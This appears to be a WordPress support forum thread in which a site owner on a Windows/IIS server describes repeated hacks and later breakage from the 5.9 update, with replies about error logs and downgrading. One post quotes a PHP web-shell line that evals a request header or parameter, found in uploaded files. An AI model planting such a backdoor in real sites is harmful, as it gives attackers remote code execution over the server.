salescart

This is what I am seeing.

Someone has found a way to upload files which is the most bizarre thing….how can they do that?
The files have numbers and the contents have PHP content:

<?php @eval($_HEADERS[“Sec-Websocket-Accept”]);@eval($_REQUEST[“Sec-Websocket-Accept”]);

Also, they have changed the WP-Settings.php file…what mechanism allows them to do this?

Also, they have uploaded a wp-blog-header.php file which I don’t even believe was originally there. How do I permanently turn off all the blog capabilities. I thought I did already.

They are literally adding their own plugins:
0qn17s61

I had wordfence installed but they blew that like it was a paper fence.

All of these permissions with CHMOD describe Unix servers. I’m on a windows server and IIS works completely different with an IUSR account. I set all the permissions correctly towards that.

Also, I have tried multiple security plugins and none of them have worked for me. The rest of the regular websites never have any issues only the wordpress websites…these should be read only. There must be advanced features like API-access or other things on. How do I completely turn off the WP-admin control panel completely ?

Shayan H.

Wordfence can scan every file for every extension and fix it…..and I’ve done that including adding a new vanilla update to WordPress and shutting permissions down and it made no difference. Hacked again.

Ok, that is helpful. Basically I want to restore the website, turn publishing off and make the website “read-only”.

It is a BitNinja report (https://bitninja.com/) from my ISP flagging my IP that has the wordpress website on. I deleted and restored but someone seems to go back and re-hack it each time.

What is WordFence? Looking at it now.

Thanks for your reply.

• This reply was modified 2 years ago by salescart.

Eset NOD32 is the anti-virus.
If you have a recommendation for a windows server, let me know.

All of the web sites are completely different. WordPress 5.9. PHP 5.6.

It is happening on multiple websites. The virus scanner is making them as viruses. The basically are files like .13141915 when no first part of the file name. I haven’t opened the files because they are flagged by the virusscanner. They are everywhere but mainly on the root of the folder and the content/uploads folders.

How do I completely disable ALL UPLOADS and ALL discussion posting. I don’t even have any discussion forums going on yet I got to the Admin and people are posting spam discussions to a page that doesn’t even have a discussion on it.

This software is not very safe at all from exploits.

Ok, got this one solved

Thanks for your reply.

I am the host. The first is getting erased by some function of WordPress, a plugin, or a theme.

I disabled a number of other plugins. One was a Legacy Ninja Forms (it might have been that one). So far, so good. The site has remained up for longer than I can remember and over 8 hours at this point.

I am running a lower version of PHP. I tried going to later version of PHP 7.4 and it didn’t stop the problem. I decided to go back to an older version that was working tried and true for now so as to not add additional variables.

Yes, while broken. No effect or change.
I don’t want it to upgrade to 5.9. It needs to stop. I believe I have set the wpconfig for it to stop doing that. So I’m not sure HOW it is self upgrading anymore. No software on earth should “self-upgrade” and I know of no software besides WP that does it. Even my iPhone warns me and allows me to delay and that is about the worse case before that I am aware of.

I have tried renaming the plugins and the themes and that doesn’t do anything. For some reason WordPress keeps doing some kind of secret updating and breaks it self. I believe I have set the settings for it to STOP doing that. However, the setting must not really be 100%.

I believe the file it is complaining about is WordPress proper and not any plug-in or theme.

/wp-includes/sodium_compat/autoload.php’ (include_path=’.;C:\php\pear’) in C:\Domains\comcity.com\wwwroot\wp-includes\compat.php on line 333

Great. I’m glad you got it working!

I just went through this with the latest version of WP which stomped on my website. I ended up having to back up my website and database. Then I manually updated to the previous version of WordPress. Hopefully, that isn’t your problem.

Try turning on error logs and see what you see.

https://www.wpbeginner.com/wp-tutorials/how-to-find-and-access-wordpress-error-logs-step-by-step/

Thanks…got it.

Sorry, WordPress version 5.9 broke my entire website. So I was trying to get to the last version that worked.

I just put the website content back and put version 5.8.3 on top of my website and it is working now.

How do I turn OFF automatic WordPress updates?

Thanks for your help.